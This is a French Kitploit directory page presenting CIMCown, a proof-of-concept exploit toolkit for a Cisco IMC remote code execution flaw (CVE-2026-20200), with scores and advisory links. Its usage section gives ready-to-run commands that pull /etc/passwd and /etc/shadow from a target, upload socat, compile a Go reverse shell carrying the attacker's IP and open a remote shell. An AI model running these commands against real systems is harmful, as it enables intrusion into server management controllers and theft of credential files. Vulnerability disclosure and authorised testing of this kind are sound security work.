Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CIMCown — Boîte à outils PoC pour l'exploitation de la RCE Cisco IMC CVE-2026-20200 | Kitploit
Outils/GitHubGitHub/nside-attack-logic/cimcown
Analyse des VulnérabilitésExploitationExploitation d'Applications WebOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubnside-attack-logic/cimcown

CIMCown

Boîte à outils PoC pour l'exploitation de la RCE Cisco IMC CVE-2026-20200

Voir le dépôt
15il y a 1 moisPas encore vérifié
Site web

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CIMCown

CVE-2026-20200 Injection d'arguments dans Cisco IMC avec RCE

Christoph Peil @ NSIDE ATTACK LOGIC 2026

CVE: CVE-2026-20200
CVSS v3.1 (CISCO): 8.8 AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS v3.1 (NSIDE): 9.9 AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Advisory: NSIDE-SA-2026-003
Blogpost: https://www.nsideattacklogic.de/en/cisco-imc-when-remote-management-becomes-a-backdoor-cve-2026-20200/

Cette preuve de concept est uniquement destinée à des fins de démonstration et ne doit pas être utilisée pour des activités illégales. NSIDE ATTACK LOGIC n'est pas responsable des dommages causés par l'utilisation ou la mauvaise utilisation de ce code.

Cet exploit permet de télécharger des fichiers, d'en téléverser et de générer un reverse shell. Il contient plusieurs fichiers Python de la preuve de concept (PoC), un dossier shell et un dossier .

download

Dans le dossier download sont placés tous les fichiers téléchargés depuis le serveur, avec leur nom (par exemple /etc/passwd > passwd).

Le dossier shell contient tout ce qui est nécessaire pour un reverse shell. Le fichier lib.so est une petite bibliothèque, construite pour ARM afin d'exécuter simplement le binaire sur l'IMC dans /tmp/main. La commande exacte utilisée pour la construire se trouve dans util.py. Le dossier contient également un reverse_shell.go.example, un petit reverse shell en Go, qui doit être compilé au préalable afin d'y inclure votre adresse IP locale utilisée pour le reverse shell.

Pour que le reverse shell fonctionne, vous devez d'abord le construire avec l'action -a build.

Installation :

root@kitploit:~
sudo apt install golang-go
pip install -r requirements.txt

Utilisation

root@kitploit:~
Usage: CIMCown.py [-h] [--proxy PROXY] -t HOST -u USERNAME -p PASSWORD [-a ACTION] [-v]
options:
  -h, --help            show this help message and exit
  --proxy PROXY         Set proxy to use, e.g. 127.0.0.1:8080 (Default: NONE)
  -t, --host HOST       Target hostname or IP address (format 10.0.0.1 or 10.0.0.2:1337)
  -U, --username USERNAME
  -P, --password PASSWORD
  -a, --action ACTION   Action: test, download, upload, build, shell (default: test)
						Test will connect to the CIMC and download the file /etc/passwd
  -u, --uploadFile UPLOADFILE
                        File to upload
  -p, --remoteFile REMOTEFILE
                        Remote file path to upload to
  -d, --downloadFile DOWNLOADFILE
                        File to download, is saved into 'Download'
  -v, --verbose         Displays more information about cimc

Exemples

Attention à la majuscule U et à la majuscule P pour l'utilisateur et le mot de passe !

Tester l'outil et se connecter

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a test -t 192.168.10.2

Télécharger le fichier /etc/shadow

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a download -d '/etc/shadow' -t 192.168.10.2

Téléverser le fichier ./shell/socat vers /tmp/socat

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a upload -u './shell/socat' -p '/tmp/socat' -t 192.168.10.2

Compiler le reverse shell Go

root@kitploit:~
python ./CIMCown.py -U testAdmin -P testPassword -a build

Obtenir un reverse shell

l'action 'build' est nécessaire au préalable pour l'adresse IP locale dans revShell
root@kitploit:~
# action 'build' is needed before for local IP in revShell
python ./CIMCown.py -U testAdmin -P testPassword -a shell
Télécharger l’outil